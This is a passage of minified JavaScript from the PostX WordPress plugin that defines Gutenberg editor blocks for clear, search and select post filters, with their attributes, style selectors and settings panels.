Settings","ultimate-post"),options:m(c)}]}}],y=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"clear_button_sty",title:__("Clear Button Styles","ultimate-post"),options:m(u)},{name:"selected_filter_sty",title:__("Selected Filter Styles","ultimate-post"),options:m(d)}]}}];function b({attributes:e,setAttributes:t,name:l,clientId:p}){const m={setAttributes:t,name:l,attributes:e,clientId:p};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:m,include:[{type:"custom",icon:i.Z.setting,label:__("Clear Filter Settings","ultimate-post")}]},(0,o.createElement)(a.B3,{store:m,include:g()})),(0,o.createElement)(r.Z,{store:m,include:[{type:"custom",icon:i.Z.styleIcon,label:__("Clear Filter Styles","ultimate-post")}]},(0,o.createElement)(a.B3,{store:m,include:y()})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-clear-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:m,include:c})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:__("Clear Button Style","ultimate-post"),initialOpen:!0,store:m,include:u}),(0,o.createElement)(a.T,{title:__("Selected Filter Style","ultimate-post"),store:m,include:d,initialOpen:!0}))),(0,a.dH)()))}},61102:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},clearButtonText:{type:"string",default:"Clear Filter"},clearButtonPosition:{type:"string",default:"auto",style:[{selector:"{{ULTP}}-wrapper { flex-basis: {{clearButtonPosition}} ; }"}]},cAlignEnable:{type:"boolean",default:!1},cAlign:{type:"string",default:{lg:"start",sm:"start",xs:"start"},style:[{selector:"{{ULTP}}-wrapper { justify-content:{{cAlign}} ; display:flex;flex-wrap:wrap; }"},{depends:[{key:"cAlignEnable",condition:"==",value:!0}],selector:"{{ULTP}}-wrapper { justify-content:{{cAlign}} ; display:flex;flex-wrap:wrap;flex-grow:1; }"}]},gap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}}-wrapper { gap: {{gap}}; }"}]},cbTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button { color:{{cbColor}}; } "}]},cbColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button:hover { color:{{cbColorHover}}; } "}]},cbBgColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button { background-color:{{cbBgColor}}; } "}]},cbBgHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button:hover { background-color:{{cbBgHoverColor}}; } "}]},cbBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbBorderRadius:{type:"object",default:{lg:{top:"3",bottom:"3",left:"3",right:"3",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-clear-button { border-radius: {{cbBorderRadius}}; }"}]},cbBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-clear-button { padding:{{cbPadding}}; }"}]},sfTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-selected-filter-text"}]},sfIconSize:{type:"object",default:{lg:"13",unit:"px"},style:[{selector:"{{ULTP}} .ultp-selected-filter-icon svg { width: {{sfIconSize}}; height:{{sfIconSize}} }"}]},sfColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter-text { color:{{sfColor}}; }  \n                    {{ULTP}} .ultp-selected-filter-icon svg { fill:{{sfColor}}; }"}]},sfColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter:hover .ultp-selected-filter-text { color:{{sfColorHover}}; }  \n                    {{ULTP}} .ultp-selected-filter:hover .ultp-selected-filter-icon svg { fill:{{sfColorHover}}; }"}]},sfBgColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter { background-color:{{sfBgColor}}; } "}]},sfBgHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter:hover { background-color:{{sfBgHoverColor}}; } "}]},sfBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-selected-filter"}]},sfBorderRadius:{type:"object",default:{lg:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-selected-filter { border-radius:{{sfBorderRadius}}; }"}]},sfBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-selected-filter"}]},sfPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-selected-filter { padding:{{sfPadding}}; }"}]}}},20223:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(61102),n=l(14585),r=l(54685);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");s(r,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/clear-filter.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Clears all the selected filter","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),usesContext:["post-grid-parent/postBlockClientId","advanced-filter/cId"],edit:n.Z,ancestor:["ultimate-post/advanced-filter"],attributes:i.Z})},7402:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(53049),i=l(99838),n=l(64766),r=l(63658);const{__}=wp.i18n,{useEffect:s}=wp.element,{useBlockProps:p}=wp.blockEditor;function c({attributes:e,setAttributes:t,clientId:l,context:c}){const{blockId:u}=e;s((()=>{t({blockId:l.slice(-6)})}),[l]);const d=p({className:`ultp-block-${u} ultp-filter-search`});let m="";return u&&(m=(0,i.Kh)(e,"ultimate-post/filter-search-adv",u,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{name:"ultimate-post/filter-search-adv",attributes:e,setAttributes:t,clientId:l}),m&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:m}}),(0,o.createElement)("div",d,(0,o.createElement)("div",{className:"ultp-filter-search-input"},(0,o.createElement)("input",{"aria-label":"search",type:"search",placeholder:e.placeholder}),(0,o.createElement)("span",{className:"ultp-filter-search-input-icon"},n.ZP.search_line))))}},63658:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"margin-right: auto !important;margin-left:0px !important",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"margin-left:0px !important;margin-right:0px !important",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"margin-left: auto !important;margin-right:0px !important",label:__("Right","ultimate-post")}],c=[{data:{type:"alignment",key:"searchAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value)),icons:["left","flow","right"]}},{data:{type:"tag",key:"sWidthType",label:__("Input Width","ultimate-post"),options:[{value:"auto",label:__("Auto","ultimate-post")},{value:"fit-content",label:__("Fixed","ultimate-post")},{value:"100%",label:__("Full","ultimate-post")}]}},{data:{type:"range",key:"sWidth",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Max Width","ultimate-post")}},{data:{type:"text",key:"placeholder",label:__("Placeholder Text","ultimate-post")}}],u=[{data:{type:"typography",key:"sTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"sIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"sColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"sColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"sBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"border",key:"sBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"sBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"sBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"dimension",key:"sPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],d=e=>e.map((e=>e.data)),m=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"settings",title:__("Search Filter Settings","ultimate-post"),options:d(c)}]}}],g=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"style",title:__("Search Filter Style","ultimate-post"),options:d(u)}]}}];function y({attributes:e,setAttributes:t,name:l,clientId:p}){const d={setAttributes:t,name:l,attributes:e,clientId:p};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:d,include:[{type:"custom",label:__("Search Filter Settings","ultimate-post"),icon:i.Z.setting}]},(0,o.createElement)(a.B3,{store:d,include:m()})),(0,o.createElement)(r.Z,{store:d,include:[{type:"custom",label:__("Search Filter Style","ultimate-post"),icon:i.Z.styleIcon}]},(0,o.createElement)(a.B3,{store:d,include:g()})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-search-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:d,include:c})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:d,include:u}))),(0,a.dH)()))}},47878:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},placeholder:{type:"string",default:"Search..."},searchAlign:{type:"object",default:{lg:"margin-left:0px !important;margin-right:0px !important"},style:[{selector:"{{ULTP}} { {{searchAlign}} ; }"}]},sWidthType:{type:"string",default:"auto",style:[{selector:"{{ULTP}} { width: {{sWidthType}} ; }"}]},sWidth:{type:"object",default:{lg:"200",unit:"px"},style:[{depends:[{key:"sWidthType",condition:"==",value:"fit-content"}],selector:"{{ULTP}} .ultp-filter-search-input input {width:{{sWidth}} !important;}"}]},sTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-search-input input"}]},sIconSize:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-search-input-icon svg { width: {{sIconSize}}; height:{{sIconSize}} }"}]},sColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input input, {{ULTP}} .ultp-filter-search-input input::placeholder { color:{{sColor}}; } {{ULTP}} .ultp-filter-search-input-icon svg { fill:{{sColor}}; } "}]},sColorHover:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input:hover input { color:{{sColorHover}}; } {{ULTP}} .ultp-filter-search-input:hover .ultp-filter-search-input-icon svg { fill:{{sColorHover}}; } "}]},sBgColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input { background-color:{{sBgColor}}; } "}]},sBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-search-input"}]},sBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-search-input { border-radius:{{sBorderRadius}}; }"}]},sBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-search-input"}]},sPadding:{type:"object",default:{lg:{top:"3",bottom:"3",left:"4",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-search-input { padding:{{sPadding}}; }"}]}}},71184:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(47878),n=l(31631),r=l(7402);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/adv-filter/","block_docs");s(n,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/search-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Search Filter","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),usesContext:["post-grid-parent/postBlockClientId"],edit:r.Z,ancestor:["ultimate-post/advanced-filter"],attributes:i.Z})},25968:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{useBlockProps:i}=wp.blockEditor,{useState:n}=wp.element;function r({text:e,blockId:t,status:l}){const[r,s]=n(!1),p=i({className:`ultp-block-${t} ultp-filter-button ${r?"ultp-filter-button-active":""}`,role:"button"});return(0,a.createElement)("div",(0,o.Z)({},p,{onClick:()=>s((e=>!e))}),"loading"===l&&"Loading...","none"===l&&"None","error"===l&&"Error","success"===l&&e)}},9887:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(87025),r=l(25968),s=l(15975),p=l(22692);const{__}=wp.i18n,{useEffect:c,useMemo:u,useState:d}=wp.element,{useSelect:m,useDispatch:g}=wp.data;function y({attributes:e,setAttributes:t,clientId:l,context:g,isSelected:y}){const{blockId:b,type:v,allText:h,filterStyle:f,filterValues:k,selectedValue:w,selectedLabel:x,dropdownOptionsType:T,dropdownOptions:_}=e;c((()=>{t({blockId:l.slice(-6)})}),[l]);const C=g["post-grid-parent/postBlockClientId"],E=m((e=>{if(C){const t=e("core/block-editor").getBlocks(C).filter((e=>(0,n.M5)(e.name)));return JSON.stringify(t.filter((e=>e.attributes.queryType)).map((e=>e.attributes.queryType)))}return[]}),[C]),[S,P]=d(new Map),[L,I]=d("loading");c((()=>{"custom_tax"===v&&E&&(I("loading"),wp.apiFetch({path:"ultp/v2/custom_tax",method:"POST",data:{postTypes:JSON.parse(E)}}).then((e=>{if(0===e.length)return void I("none");const l=new Map;e.forEach((e=>{l.set(e.id,{label:e.name})})),t({postTypes:E}),P(l),I("success")})).catch((e=>{console.log(e),I("error")})))}),[E]);const[B,U]=(0,n.FW)(v,h,e);c((()=>{t({selectedValue:"_all",selectedLabel:""})}),[]);const M=u((()=>"inline"===f||"dropdown"===f&&"specific"===T?Array.from(("custom_tax"===v?"success"===L?S:new Map:"success"===B?U:new Map).entries()).map((([e,t])=>({value:e,label:t.label}))):[]),[L,f,T,B,S,U]),A=u((()=>{if("dropdown"===f&&"specific"===T){const e=JSON.parse(_),t=new Map,l="custom_tax"===v?"success"===L?S:new Map:"success"===B?U:new Map;return e.forEach((e=>{if(l.has(e)){const o=l.get(e);t.set(e,{...o})}})),t}return"custom_tax"===v?S:U}),[T,_,U,S,v,L,B,f]),H=u((()=>JSON.parse(k)),[k]);let N;return b&&(N=(0,i.Kh)(e,"ultimate-post/filter-select",b,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(p.Z,{name:"ultimate-post/filter-select",attributes:e,setAttributes:t,clientId:l,inlineOptions:M}),N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),"dropdown"===f&&(0,o.createElement)(s.Z,{name:v,options:A,status:"custom_tax"===v?L:B,blockId:b,clientId:l,value:w,openDropdown:y,onChange:(e,l)=>{t({selectedValue:String(e),selectedLabel:l})},isSearchEnabled:e.searchEnabled,searchPlaceholder:e.sPlaceholderText}),"inline"===f&&(0,o.createElement)("div",{className:`ultp-block-${b}-wrapper`},"all"!=T&&H.map(((e,l)=>{const a=M?.length?M.filter((e=>H.includes(e.value))).map((e=>e.label)):"empty";return"empty"==a&&M[0]&&M[0].value&&t({filterValues:JSON.stringify([M[0].value])}),(0,o.createElement)(r.Z,{key:e,text:a[l]||"Select a Value",status:"custom_tax"===v?L:B,blockId:b})})),"all"!=T&&0===H.length&&(0,o.createElement)(r.Z,{text:"Select a Value xyz",status:"custom_tax"===v?L:B,blockId:b}),"all"===T&&Array.from(M.entries()).map((([e,t])=>(0,o.createElement)(r.Z,{key:e,text:t.label,status:"custom_tax"===v?L:B,blockId:b})))))}},15975:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(87462),a=l(67294),i=l(87025),n=l(64766);const{useBlockProps:r}=wp.blockEditor,{useEffect:s}=wp.element;function p({name:e,value:t,options:l,status:p,blockId:c,clientId:u,onChange:d,openDropdown:m,isSearchEnabled:g=!1,searchPlaceholder:y=""}){const b=!l.has(t)&&l.size>0&&"success"===p&&t;s((()=>{if(b){const e=l.keys().next().value;d(e,"")}}),[b,d,l]);const v=r({className:`ultp-block-${c} ultp-filter-select`});return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",(0,o.Z)({},v,{"aria-expanded":m}),(0,a.createElement)("div",{className:"ultp-filter-select-field ultp-filter-select__parent"},(0,a.createElement)("span",{className:"ultp-filter-select-field-selected ultp-filter-select__parent-inner","aria-label":e},"loading"===p&&"Loading...","none"===p&&"None","error"===p&&"Error","success"===p&&(l.has(t)?l.get(t).label:"...")),(0,a.createElement)("span",{className:"ultp-filter-select-field-icon "+(m?"ultp-dropdown-icon-rotate":"")},n.ZP.collapse_bottom_line)),m&&(0,a.createElement)("ul",{className:"ultp-filter-select-options ultp-filter-select__dropdown"},g&&(0,a.createElement)("input",{className:"ultp-filter-select-search",type:"search",placeholder:y}),"success"===p&&Array.from(l.entries()).map((([t,l])=>(0,a.createElement)("li",{className:"ultp-filter-select__dropdown-inner "+(l.disabled?"disabled":""),key:t,onClick:o=>{if(l.disabled)return;const a=`${(0,i.DX)(e)}: ${l.label}`;d(t,"_all"===t?"":a)}},l.label))))))}},22692:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"margin-right: auto !important;margin-left:0px !important",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"margin-left:0px !important;margin-right:0px !important",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"margin-left: auto !important;margin-right:0px !important",label:__("Right","ultimate-post")}],c=(e,t)=>{const{filterStyle:l,type:o,dropdownOptionsType:a}=e,i=["category","tags","author","custom_tax"].includes(o),n="dropdown"===l&&i&&"specific"===a,r=["category","tags","author","custom_tax"].includes(o);return[{data:{type:"alignment",key:"align",responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value)),icons:["left","flow","right"]}},{data:{type:"tag",key:"filterStyle",label:__("Filter Style","ultimate-post"),options:[{value:"dropdown",label:"Dropdown"},{value:"inline",label:"Inline"}]}},{data:i?{type:"tag",key:"dropdownOptionsType",label:__("Available Options","ultimate-post"),options:[{value:"all",label:__("All","ultimate-post")},{value:"specific",label:__("Specific","ultimate-post")}]}:{}},{data:"inline"===l&&"specific"==a?{disableIf:e=>"inline"!==e.filterStyle,type:"select",key:"filterValues",multiple:!0,label:__("Filter Values","ultimate-post"),options:t}:{}},{data:n?{type:"select",key:"dropdownOptions",multiple:!0,label:__("Select Specific Options","ultimate-post"),options:t,help:__("First selected option will be the default value.","ultimate-post")}:{}},{data:{type:"text",key:"allText",label:__("All Content Text","ultimate-post")}},{data:r&&"author"!==o?{type:"toggle",key:"inlineMultiSelect",label:__("Enable Inline Multi Select","ultimate-post")}:{}},{data:r?{type:"toggle",key:"searchEnabled",label:__("Enable Searching in Dropdown","ultimate-post")}:{}}]},u=e=>{const{filterStyle:t}=e;return[{data:{type:"typography",key:"pTypo",label:__("Typography","ultimate-post")}},{depend:"dropdown"===t,data:{type:"range",key:"pIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"pColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"pColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"pBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"pBgColorHover",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"pBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"pBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"pBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{disableIf:e=>"inline"!==e.filterStyle,type:"range",key:"iGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap Between Inline Items","ultimate-post")}},{data:{type:"dimension",key:"pPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]},d=()=>[{data:{type:"alignment",key:"dAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0}},{data:{type:"tag",key:"dWidthType",label:__("Width","ultimate-post"),options:[{value:"auto",label:__("Auto","ultimate-post")},{value:"fixed",label:__("Fixed","ultimate-post")}]}},{data:{disableIf:e=>"fixed"!==e.dWidthType,type:"range",key:"dWidth",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Fixed Width","ultimate-post")}},{data:{type:"typography",key:"dTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"dColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"dColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"dBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"dBgColorHover",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"dBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"dBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"dBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"range",key:"dSpace",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Space between Menu","ultimate-post")}},{data:{type:"dimension",key:"dPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],m=e=>[{data:{type:"typography",key:"sTypo",label:__("Typography","ultimate-post")}},{data:{type:"text",key:"sPlaceholderText",label:__("Placeholder Text","ultimate-post")}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"sColor",label:__("Color","ultimate-post")},{type:"color",key:"sBgColor",label:__("Background Color","ultimate-post")},{type:"color",key:"sPlaceholderColor",label:__("Placeholder Color","ultimate-post")},{type:"border",key:"sBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"sBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"sBoxShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover/Active","ultimate-post"),options:[{type:"color",key:"sColorHover",label:__("Color","ultimate-post")},{type:"color",key:"sBgColorHover",label:__("Background Color","ultimate-post")},{type:"color",key:"sPlaceholderColorHover",label:__("Placeholder Color","ultimate-post")},{type:"border",key:"sBorderHover",label:__("Border","ultimate-post")},{type:"dimension",key:"sBorderRadiusHover",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"sBoxShadowHover",label:__("Box Shadow","ultimate-post")}]}]}},{data:{type:"dimension",key:"sPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"sMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],g=e=>e.map((e=>e.data)),y=(e,t)=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"general",title:__("Select Filter Settings","ultimate-post"),options:g(c(e,t))}]}}],b=(e,t)=>{const{filterStyle:l,type:o}=e,a=[{name:"field_style",title:__("dropdown"===l?"Field Style":"Style","ultimate-post"),options:g(u(e))}];return"dropdown"===l&&a.push({name:"dropdown_style",title:__("Dropdown Style","ultimate-post"),options:g(d())}),[{isToolbar:!0,data:{type:"tab_toolbar",content:a}}]};function v({attributes:e,setAttributes:t,name:l,clientId:p,inlineOptions:g}){const v={setAttributes:t,name:l,attributes:e,clientId:p},{filterStyle:h,type:f}=e;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:v,include:[{type:"custom",icon:i.Z.setting,label:__("Select Filter Settings","ultimate-post")}]},(0,o.createElement)(a.B3,{store:v,include:y(e,g)})),(0,o.createElement)(r.Z,{store:v,include:[{type:"custom",icon:i.Z.styleIcon,label:__("Select Filter Style","ultimate-post")}]},(0,o.createElement)(a.B3,{store:v,include:b(e,g)})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-select-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:v,include:c(e,g)})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:"dropdown"===h?__("Field Style","ultimate-post"):"inline",store:v,include:u(e),initialOpen:!0}),"dropdown"===h&&(0,o.createElement)(a.T,{title:__("Dropdown Style","ultimate-post"),store:v,include:d()}),["category","tags","author","custom_tax"].includes(f)&&(0,o.createElement)(a.T,{title:__("Search Input Style","ultimate-post"),store:v,include:m(e)}))),(0,a.dH)()))}},78501:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},type:{type:"string",default:""},dropdownOptionsType:{type:"string",default:"all"},dropdownOptions:{type:"string",default:'["_all"]'},filterStyle:{type:"string",default:"dropdown"},filterValues:{type:"string",default:'["_all"]'},allText:{type:"string",default:"All"},selectedValue:{type:"string",default:"_all"},selectedLabel:{type:"string",default:""},postTypes:{type:"string",default:"[]"},searchEnabled:{type:"boolean",default:!1},inlineMultiSelect:{type:"boolean",default:!0},queryOrder:{type:"string",default:"desc"},align:{type:"object",default:{lg:"margin-left:0px !important;margin-right:0px !important"},style:[{selector:"{{ULTP}}.ultp-filter-select { {{align}} ; } {{ULTP}}-wrapper { {{align}}; display:flex; flex-wrap:wrap; }"}]},iGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}}-wrapper  { gap: {{iGap}}; }"}]},pTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent-inner, {{ULTP}}.ultp-filter-button"}]},pIconSize:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"filterStyle",condition:"==",value:"dropdown"}],selector:"{{ULTP}} .ultp-filter-select-field-icon svg { width: {{pIconSize}}; height:{{pIconSize}} }"}]},pColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent-inner,{{ULTP}}.ultp-filter-button { color:{{pColor}}; } {{ULTP}} .ultp-filter-select-field-icon { color:{{pColor}}; } "}]},pColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent:hover .ultp-filter-select__parent-inner { color:{{pColorHover}}; } {{ULTP}} .ultp-filter-select__parent:hover .ultp-filter-select-field-icon svg { color:{{pColorHover}}; } {{ULTP}}.ultp-filter-button:hover{ color:{{pColorHover}}; } {{ULTP}}.ultp-filter-button-active{ color:{{pColorHover}}; }"}]},pBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button { background-color:{{pBgColor}}; } "}]},pBgColorHover:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent:hover,{{ULTP}}.ultp-filter-button:hover { background-color:{{pBgColorHover}}; } {{ULTP}}.ultp-filter-button-active { background-color:{{pBgColorHover}}; }"}]},pBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} 